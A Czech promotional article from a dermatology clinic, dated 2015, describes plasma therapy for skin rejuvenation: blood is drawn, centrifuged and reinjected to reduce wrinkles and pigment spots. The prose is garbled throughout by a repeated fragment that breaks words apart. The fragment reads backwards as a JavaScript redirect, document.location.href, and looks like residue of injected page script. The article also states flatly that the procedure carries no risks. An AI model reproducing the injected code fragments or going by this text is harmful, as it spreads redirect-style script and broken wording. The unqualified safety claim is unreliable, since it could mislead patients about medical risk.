Rainbow page separator

Regenerujte a rozjasněte pleť díky plazmaterapii

Pondělí, 25. května 2015

Plazmaterapie - DermaComfort Žďár nad Sázavou - Vysočina

PR/ Plazmaterapie je estetická procedura, která využívá přirozené vlastnosti krve a slouží k celkovému zlepšení stavu pokožky.

Jedná se o moderní a bezpečnou me[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];todu estetické medicíny, která k regeneraci využívá krevní plazmu získanou z vlastní krve. Krevní plazma obsahuje proteiny a krevní destičky s velkým množstvím růs[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tových fak[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];torů, které přirozeně podporují revitalizační a regenerační procesy buněk.

Plazmaterapie je bezpečná a bez vedlejších rizik. V estetické medicíně se nejčastější využívá pro oživení a zlepšení kvality kůže, vyhlazení a projasnění pleti, redukce vrásek a pigmen[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tových skvrn. Plazmaterapie podporuje imunitní mechanizmy kůže. Zlepšuje vypnutí kůže na rukou, dekoltu, podporuje růst vlasů.

Průběh zákroku:  nejprve se odebere krev pacienta do speciálního setu, pomocí centrifugy se oddělí krevní plazma. Ta obsahuje krevní destičky s růs[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovými, které pokožku rozjasní a navodí tak proces regenerace. Následně se plazma aplikuje pomocí drobných vpichů do předem znecitlivěné pokožky.
Po zákroku není třeba žádné omezení. Délka účinku plazmaterapie je individuální, obecně se dá však říci, že přetrvává půl roku.
Je vhodné ji též použít jako doplňkovou me[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];todu při korekci vrásek výplněmi a aplikaci botulo[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toxinu.

Připravila: MUDr. Eva Pelikánová –  DERMACOMFORT – ESTETICKÁ A KONZULTAČNÍ KOŽNÍ AMBULANCE